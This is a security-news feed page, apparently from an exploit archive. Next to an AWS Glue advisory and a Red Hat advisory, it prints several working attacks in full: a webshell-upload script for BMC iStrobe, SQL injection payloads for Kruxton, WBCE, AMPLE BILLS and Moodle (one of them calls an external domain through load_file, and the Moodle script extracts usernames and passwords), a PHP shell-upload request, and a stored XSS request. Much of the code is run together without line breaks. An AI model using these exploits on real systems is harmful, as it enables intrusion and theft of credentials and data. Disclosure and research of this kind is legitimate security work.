The password of database connections in AWS Glue is loaded into the website when a connection's edit page is requested. Principals with appropriate permissions can read the password. This behavior also increases the risk that database passwords will be intercepted by an attacker during transmission in the server response. Many types of vulnerabilities, such as broken access controls, cross site scripting and weaknesses in session handling, could enable an attacker to leverage this behavior to retrieve the passwords.

SEC Consult Vulnerability Lab Security Advisory < 20240411-0 >  
=======================================================================  
               title: Database Passwords in Server Response  
             product: Amazon AWS Glue  
  vulnerable version: until 2024-02-23  
       fixed version: as of 2024-02-23  
          CVE number: -  
              impact: medium  
            homepage: https://aws.amazon.com/glue/  
               found: 2023-05-10  
                  by: Michael Werner (Eviden)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"AWS Glue is a serverless data integration service that makes it easier to  
discover, prepare, move, and integrate data from multiple sources for  
analytics, machine learning (ML), and application development."

Source: https://aws.amazon.com/glue/

Business recommendation:  
------------------------  
The vendor has fixed the issue in the currently available version  
on all instances world-wide as of 2024-02-23.

Vulnerability overview/description:  
-----------------------------------  
1) Database Passwords in Server Response  
The password of database connections in AWS Glue is loaded into the  
website when a connection's edit page is requested. Principals with  
appropriate permissions can read the password. This behavior also  
increases the risk that database passwords will be intercepted by an  
attacker during transmission in the server response. Many types of  
vulnerabilities, such as broken access controls, cross-site scripting  
and weaknesses in session handling, could enable an attacker to  
leverage this behavior to retrieve the passwords.

Proof of concept:  
-----------------  
1) Database Passwords in Server Response  
The following steps are necessary to reconstruct the vulnerability:  
     1. Login to the AWS Console and switch to the Glue module.  
     2. Go to "Data connections" and create a new connection.  
     3. Choose a connection type that allows username / password  
        authentication (e.g. JDBC).  
        <image ref: aws_glue_connection_config.webp>  
     4. Open the new connection's "Edit" page and inspect the password  
        field e.g. with the browser's DevTools.  
        <image ref: aws_glue_poc.webp>

The following permissions were used:  
* glue:GetConnections (for the list view of connections; not necessary  
   to open the connection page itself if the connection name is known)  
* glue:GetConnection (for opening the connection page)  
* ec2:DescribeSubnets (for opening the edit page of a connection)

Permission Summary:  
A principal only needs the permissions glue:GetConnection and ec2:DescribeSubnets  
to retrieve the database password of a connection. The attacker also  
needs either knowledge of the connection's name to open the edit page  
directly (e.g. https://us-east-1.console.aws.amazon.com/gluestudio/home?region=us-east-1#/connection/edit-connection/Security%20Advisory/)  
or the permission glue:GetConnections to list existing connections.

Vulnerable / tested versions:  
-----------------------------  
The version that was current at 2023-05-10 has been tested and found to be  
vulnerable.

Vendor contact timeline:  
------------------------  
2023-06-07: Contacting vendor through aws-security@amazon.com  
2023-06-07: Vendor response, provides PGP key, sending encrypted  
             security advisory.  
2023-06-08: Vendor response, team is investigating the report, asking  
             about public disclosure timeline.  
2023-06-16: Vendor is still working on the report, will inform us on a  
             weekly basis.  
2023-07-24: Vendor requires additional time, next update will be early  
             September, provides weekly updates.  
2023-09-14: Vendor team is working on rolling out a fix.  
2023-09-21: Vendor encountered roll-out issues, full mass deployment now  
             scheduled to be finished in 2023Q4.  
2023-10-05: Vendor hit "first milestone" in their development, 3-staged  
             approach.  
2023-10-25: Vendor hit second milestone before full rollout.  
2024-02-14: Asking for a status update.  
2024-02-15: Vendor is still working on the issue.  
             Asking them for a timeline.  
2024-02-23: Vendor reports that fix is implemented and deployed worldwide.  
             Coordinating public release.  
2024-02-28: Sending details where we publish the advisory, asking for a  
             CVE number.  
2024-03-01: Vendor asks whether we meant CVE or CVSS.  
2024-04-08: Clarifying that we mean CVE, but CVE not needed for cloud.  
             Setting release date to 11th April.  
2024-04-11: Coordinated release of security advisory.

Solution:  
---------  
The vendor has fixed the issue and deployed the patch worldwide as of  
as of 2024-02-23.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Michael Werner / @2024

Amazon AWS Glue Database Password Disclosure

This Metasploit exploit module leverages an improperly controlled modification of dynamically-determined object attributes vulnerability (CVE-2023-43177) to achieve unauthenticated remote code execution. This affects CrushFTP versions prior to 10.5.1. It is possible to set some user's session properties by sending an HTTP request with specially crafted Header key-value pairs. This enables an unauthenticated attacker to access files anywhere on the server file system and steal the session cookies of valid authenticated users. The attack consists in hijacking a user's session and escalates privileges to obtain full control of the target. Remote code execution is obtained by abusing the dynamic SQL driver loading and configuration testing feature.

CrushFTP Remote Code Execution

WordPress WP Video Playlist plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)# Date: 12 April 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.1.1# Proof Of Concept:1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]".# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w# Vulnerable Property at Request: videoFields[post_type]# Payload: <script>alert(document.cookie)</script># Request:POST /wp-admin/options.php HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 395Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=video_managerAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, ioption_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

BMC Compuware iStrobe Web version 20.13 suffers from a remote shell upload vulnerability.

    #!/usr/bin/env python3# Exploit Title: Pre-auth RCE on Compuware iStrobe Web# Date: 01-08-2023# Exploit Author: trancap# Vendor Homepage: https://www.bmc.com/# Version: BMC Compuware iStrobe Web - 20.13# Tested on: zOS# CVE : CVE-2023-40304# To exploit this vulnerability you'll need "Guest access" enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files)# The vulnerable parameter of the form is "fileName". Using the form, one can upload a webshell (content of the webshell in the "topicText" parameter).# I contacted the vendor but he didn't consider this a vulnerability because of the Guest access needed.import requestsimport urllib.parseimport argparseimport sysdef upload_web_shell(url):  data = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"open","topicText":"<%@page import=\"java.lang.*,java.io.*,java.util.*\" %><%Processp=Runtime.getRuntime().exec(request.getParameter(\"cmd\"));BufferedReaderstdInput = new BufferedReader(newInputStreamReader(p.getInputStream()));BufferedReader stdError = newBufferedReader(new InputStreamReader(p.getErrorStream()));Strings=\"\";while((s=stdInput.readLine()) !=null){out.println(s);};s=\"\";while((s=stdError.readLine()) !=null){out.println(s);};%>","lang":"en","type":"MODULE","status":"PUB"}  # If encoded, the web shell will not be uploaded properly  data = urllib.parse.urlencode(data, safe='"*<>,=()/;{}!')  # Checking if web shell already uploaded  r = requests.get(f"{url}/istrobe/jsp/userhelp/ws.jsp", verify=False)  if r.status_code != 404:    return  r = requests.post(f"{url}/istrobe/userHelp/saveUserHelp", data=data,verify=False)  if r.status_code == 200:    print(f"[+] Successfully uploaded web shell, it should beaccessible at {url}/istrobe/jsp/userhelp/ws.jsp")  else:    sys.exit("[-] Something went wrong while uploading the web shell")def delete_web_shell(url):  paramsPost = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"delete","lang":"en","type":"MODULE","status":"PUB"}  response = session.post("http://220.4.147.38:6301/istrobe/userHelp/deleteUserHelp",data=paramsPost, headers=headers, cookies=cookies)  if r.status_code == 200:    print(f"[+] Successfully deleted web shell")  else:    sys.exit("[-] Something went wrong while deleting the web shell")def run_cmd(url, cmd):  data = f"cmd={cmd}"  r = requests.post(f"{url}/istrobe/jsp/userhelp/ws.jsp", data=data,verify=False)  if r.status_code == 200:    print(r.text)  else:    sys.exit(f'[-] Something went wrong while executing "{cmd}" command')parser = argparse.ArgumentParser(prog='exploit_cve_2023_40304.py', description='CVE-2023-40304 - Pre-auth file upload vulnerability + path traversal to achieve RCE')parser.add_argument('url', help='Vulnerable URL to target. Must be like http(s)://vuln.target')parser.add_argument('-c', '--cmd', help='Command to execute on the remote host (Defaults to "whoami")', default='whoami')parser.add_argument('--rm', help='Deletes the uploaded web shell', action='store_true')args = parser.parse_args()upload_web_shell(args.url)run_cmd(args.url, args.cmd)if args.rm:  delete_web_shell(args.url)

BMC Compuware iStrobe Web 20.13 Shell Upload

Kruxton version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: kruxton-1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 04/15/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=DKVEBDYC@burpcollaborator.net'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''OR NOT 7810=7810 OR 'LaNe'='bRUy&password=v0N!p1j!S6    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: username=DKVEBDYC@burpcollaborator.net'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''AND (SELECT 1998 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT(ELT(1998=1998,1))),0x716b627071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR'jdui'='fNTo&password=v0N!p1j!S6    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=DKVEBDYC@burpcollaborator.net'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''AND (SELECT 2923 FROM (SELECT(SLEEP(7)))UJBe) OR'ffIk'='SAqf&password=v0N!p1j!S6---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0/Multiple-SQLi)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-multiple-sqli.html)## Time spent:01:15:00

Kruxton 1.0 SQL Injection

Kruxton version 1.0 suffers from a remote shell upload vulnerability.

## Title: kruxton-1.0-FileUpload-RCE  
## Author: nu11secur1ty  
## Date: 04/15/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
## Reference: https://portswigger.net/web-security/file-upload

## Description:  
The system setting with parameter IMG is vulnerable to File Upload  
vulnerability.  
The attacker can upload a very malicious PHP file into the server and  
then he can execute it  
This is a potential CRITICAL PROBLEM!

STATUS: HIGH- Vulnerability

[+]Payload:  
```POST  
POST /kruxton/ajax.php?action=save_settings HTTP/1.1  
Host: localpwnedhost.com  
Cookie: bLicense67=1; sEmail=kurec%40guhai.mi.huq;  
PHPSESSID=lp21rf44drtnogjboa8v7lpmg1  
Content-Length: 1043  
Sec-Ch-Ua: "Chromium";v="123", "Not:A-Brand";v="8"  
Accept: */*  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryUwsdkjlNQ5exBwrq  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88  
Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://localpwnedhost.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://localpwnedhost.com/kruxton/index.php?page=site_settings  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=1, i  
Connection: close

------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="name"

Kruxton Bristo By Mayuri K  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="email"  
mayuri.infospace@gmail.com  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="contact"

9000000000  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="about"

<p>Kruxton Bristo By Mayuri K</p><p data-f-id="pbf" style="text-align:  
center; font-size: 14px; margin-top: 30px; opacity: 0.65; font-family:  
sans-serif;">Powered by <a  
href="https://www.froala.com/wysiwyg-editor?pb=1" title="Froala  
Editor">Froala Editor</a></p>  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="img"; filename="1nsi1deyou.php"  
Content-Type: application/octet-stream

<?php  
// by nu11secur1ty - 2024  
//Your malicious code here  
?>

------WebKitFormBoundaryUwsdkjlNQ5exBwrq--  
```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-fileupload-rce.html)

## Time spent:  
00:15:00

Kruxton 1.0 Shell Upload

WBCE version 1.6.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0  
# Date: 15.11.2023   
# Exploit Author: young pope   
# Vendor Homepage: https://github.com/WBCE/WBCE_CMS   
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip   
# Version: 1.6.0   
# Tested on: Kali linux   
# CVE : CVE-2023-39796

There is an sql injection vulnerability in *miniform* module which is a   
default module installed in the *WBCE* cms. It is an unauthenticated   
sqli so anyone could access it and takeover the whole database.

In file /modules/miniform/ajax_delete_message.php there is no   
authentication check. On line |40| in this file, there is a |DELETE|   
query that is vulnerable, an attacker could jump from the query using   
tick sign - ```.

Function |addslashes()|   
(https://www.php.net/manual/en/function.addslashes.php) escapes only   
these characters and not a tick sign:

  * single quote (')  
  * double quote (")  
  * backslash ()  
  * NUL (the NUL byte

The DB_RECORD_TABLE parameter is vulnerable.

If an unauthenticated attacker send this request:

```

POST /modules/miniform/ajax_delete_message.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML,   
like Gecko) Chrome/36.0.1985.125 Safari/537.36  
Connection: close  
Content-Length: 162  
Accept: */*  
Accept-Language: en  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate

action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

```

The response is received after 6s.

Reference links:

  * https://nvd.nist.gov/vuln/detail/CVE-2023-39796  
  * https://forum.wbce.org/viewtopic.php?pid=42046#p42046  
  * https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1  
  * https://pastebin.com/PBw5AvGp

WBCE 1.6.0 SQL Injection

AMPLE BILLS version 0.1 suffers from a remote SQL injection vulnerability.

    ## Title: AMPLE BILLS 0.1 Multiple-SQLi## Author: nu11secur1ty## Date: 04/13/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The customer parameter (#1*) appears to be vulnerable to SQL injectionattacks. The payload (select*from(select(sleep(20)))a) was submittedin the customer parameter. The application took 20017 milliseconds torespond to the request, compared with 4 milliseconds for the originalrequest, indicating that the injected SQL command caused a time delay.The database appears to be MySQL. The attacker can get all informationfrom the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: #1* ((custom) POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)    Payload: customer=(-2876) OR5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024    Type: UNION query    Title: MySQL UNION query (random number) - 1 column    Payload: customer=(-8147) UNION ALL SELECTCONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024- 04/13/2024---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html)## Time spent:01:15:00

AMPLE BILLS 0.1 SQL injection

Red Hat Security Advisory 2024-1812-03 - Custom Metrics Autoscaler Operator for Red Hat OpenShift including security updates. Issues addressed include denial of service and memory leak vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1812.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Custom Metrics Autoscaler Operator for Red Hat OpenShift 2.12.1-376 Bug Fixes  
Advisory ID:        RHSA-2024:1812-03  
Product:            OpenShift Custom Metrics Autoscaler  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1812  
Issue date:         2024-04-15  
Revision:           03  
CVE Names:          CVE-2023-39326  
====================================================================

Summary: 

Custom Metrics Autoscaler Operator for Red Hat OpenShift including security  
updates.

The following updates for the Custom Metric Autoscaler operator for Red Hat OpenShift are now available:

* custom-metrics-autoscaler-adapter-container  
* custom-metrics-autoscaler-admission-webhooks-container  
* custom-metrics-autoscaler-container  
* custom-metrics-autoscaler-operator-bundle-container  
* custom-metrics-autoscaler-operator-container

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Custom Metrics Autoscaler Operator for Red Hat OpenShift is an optional operator, based on the Kubernetes Event Driven Autoscaler (KEDA), which allows workloads to be scaled using additional metrics sources other than pod metrics. This release builds upon updated compiler, runtime library, and base images for the purpose of resolving any potential security issues present in previous toolset versions.

This version makes use of newer tools and libraries to address the following issues:  
golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)  
jose-go: improper handling of highly compressed data (CVE-2024-28180)  
opentelemetry-go-contrib: DoS vulnerability in otelgrpc due to unbound cardinality metrics (CVE-2023-47108)

In addition, the following bug has been fixed:  
Custom metrics operator memory leak when invalid scaledObject is defined (prometheus scaler)

This release is based upon KEDA 2.12.1

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-39326

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/cve/CVE-2024-28180  
https://access.redhat.com/security/cve/CVE-2023-47108  
https://access.redhat.com/security/cve/CVE-2023-39326  
https://bugzilla.redhat.com/show_bug.cgi?id=2251198  
https://bugzilla.redhat.com/show_bug.cgi?id=2253330  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854  
https://issues.redhat.com/browse/OCPBUGS-25806  
https://issues.redhat.com/browse/OCPBUGS-30145

Red Hat Security Advisory 2024-1812-03

Moodle version 3.10.1 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter# Google Dork: # Date: 04/11/2023# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)# Vendor Homepage: https://moodle.org/# Software Link: # Version: 3.10.1# Tested on: Linux# CVE : CVE-2021-36393import requestsimport stringfrom termcolor import colored# Request detailsURL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"HEADERS = {    "Accept": "application/json, text/javascript, */*; q=0.01",    "Content-Type": "application/json",    "X-Requested-With": "XMLHttpRequest",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",    "Origin": "http://127.0.0.1:8080",    "Referer": "http://127.0.0.1:8080/moodle/my/",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",    "Connection": "close"}# Characters to testcharacters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"def test_character(payload):    response = requests.post(URL, headers=HEADERS, json=[payload])    return response.elapsed.total_seconds() >= 3def extract_value(column, label):    base_payload = {        "index": 0,        "methodname": "core_course_get_enrolled_courses_by_timeline_classification",        "args": {            "offset": 0,            "limit": 0,            "classification": "all",            "sort": "",            "customfieldname": "",            "customfieldvalue": ""        }    }    result = ""    for _ in range(50):  # Assumes a maximum of 50 characters for the value        character_found = False        for character in characters_to_test:            if column == "database()":                base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"            else:                base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"                        if test_character(base_payload):                result += character                print(colored(f"{label}: {result}", 'red'), end="\r")                character_found = True                break        if not character_found:            break    # Print the final result    print(colored(f"{label}: {result}", 'red'))if __name__ == "__main__":    extract_value("database()", "Database")    extract_value("username", "Username")    extract_value("password", "Password")

Tag

#web